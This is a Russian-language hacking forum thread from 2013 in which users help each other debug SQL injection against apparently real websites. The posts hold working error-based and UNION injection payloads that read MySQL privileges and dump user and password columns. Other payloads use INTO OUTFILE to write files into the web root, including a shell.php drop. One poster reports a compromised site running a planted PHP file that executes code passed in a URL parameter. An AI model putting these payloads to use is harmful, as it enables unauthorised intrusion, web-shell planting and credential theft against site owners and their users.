ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.06.2013, 15:18
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
Провел на форуме:
189651
Репутация:
-5
|
|
Ну вот я делаю по такому плану чтобы узнать file_priv:
597+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,grant_priv,0x27,0x7e))+fr om+mysql.user+where+user='root'+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Мне выдает:
Ошибка SQL запроса Duplicate entry '~'Y'~1' for key 'group_key'
Далее делаю заливку файла:
597+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,'123456',0x27,0x7e))+from+mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`information_s chema`.tables+group+by+x)a)+and+1=1
На что мне выдает:
Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and' at line 1
Где ошибка?
|
|
|
24.06.2013, 16:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Ну вот я делаю по такому плану чтобы узнать file_priv:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,grant_priv,0x27,0x7e))+fr om+mysql.user+where+user='root'+limit+0,1),floor(r and(0)*2))x+from+`information_schema`.tables+group +by+x)a)+and+1=1
Мне выдает:
Ошибка SQL запроса Duplicate entry '~'
Y
'~1' for key 'group_key'
Далее делаю заливку файла:
597
+and(select+1+from(select+count(*),concat((select+ (select+concat(0x7e,0x27,'123456',0x27,0x7e))+from+mysql.user+into+outfile+'/var/www/admin/data/www/site.ru/news/images/1.txt'+limit+0,1),floor(rand(0)*2))x+from+`information_s chema`.tables+group+by+x)a)+and+1=1
На что мне выдает:
Ошибка SQL запроса You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
'limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and'
at line 1
Где ошибка?
в blind sql-inj, это делается, как правило таким образом
Код:
Code:
?var=data' LIMIT 1 INTO OUTFILE '/home/path/site/shell.php' LINES TERMINATED BY ''-- 1
|
|
|
|
24.06.2013, 16:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Evil_Genius
Evil_Genius said:
Где ошибка?
Ты узнаешь grant_priv, а не file_priv. И зачем писать запрос для вывода ошибки, если можно выполнить простой подзапрос?
Код:
Code:
+and(select'123'into+outfile+'/tmp/gg.txt')+and+1=1
Havij+Sniffer = Bad.
P.S. Нашел сайт, льется нормально:
news/images/aa.php?a=phpinfo();
|
|
|
|
24.06.2013, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
55516
Репутация:
0
|
|
Есть проблема:
SQL фильтрует скобки () то есть запрос просто останавливается… впринципе возможно раскрутить и без скобок в особом случае, но и тут облом - при выводе из базы она ругается на несоответствующий тип данных, то есть информацию из базы надо конвертировать во что то, а конверт функции разумеется юзают (), поэтому как быть, я затрудняюсь.
Как быть?
|
|
|
|
25.06.2013, 00:52
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...
|
|
|
|
25.06.2013, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
55516
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
Может попробовать на прямую сделать запрос на стандартные пользовательские таблы или как вариант за хексить колонки, там не используются скобки, следущий как вариант попробовать найти подзапрос на вывод таблы, изредко но поподается, если есть префикс при выводе ошибки и знакомая цмс, то оброщайся на прямую, бывают еще такие случаи что подобные ошибки в скулях индексируются ПС, т.е как вариант...
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.
|
|
|
|
25.06.2013, 01:20
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от preno
preno said:
1) искать подзапросы не вариант, и в нашем случае его однозначно нету.
2) если найти пользовательские таблицы, то будет тоже самое, инфу выводить как? будет несоответствие типов данных.
3) по поводу захексить колонки без () это как? непонел. Покажи пример, пожалуйста.
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
|
|
|
|
25.06.2013, 01:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
55516
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
пример вывода таблиц:
select 1,2,table_name,3,4 from information_schema.tables limit x,1#
Пример вывода колонок:
select 1,2,column_name,3,4 from information_schema.columns where table_name=0x[hex значение таблы юзеров] limit x,1#
Пример вывода значений из пользовательских табл:
select 1,2,user,password from [пользовательская табла]
С хексом бывает, срабатывают изредко такие слечия:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user
|
|
|
|
25.06.2013, 01:45
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от preno
preno said:
твой пример:
select 0x75736572 from table_user выдаст user но никак не информацию из таблицы table_user
|
|
|
|
25.06.2013, 01:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
69791
Репутация:
-7
|
|
Сообщение от winstrool
winstrool said:
Пример вывода значений из пользовательских табл:
select 1,2,0x[user],0x[password0] from[пользовательская табла]
Жестко.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
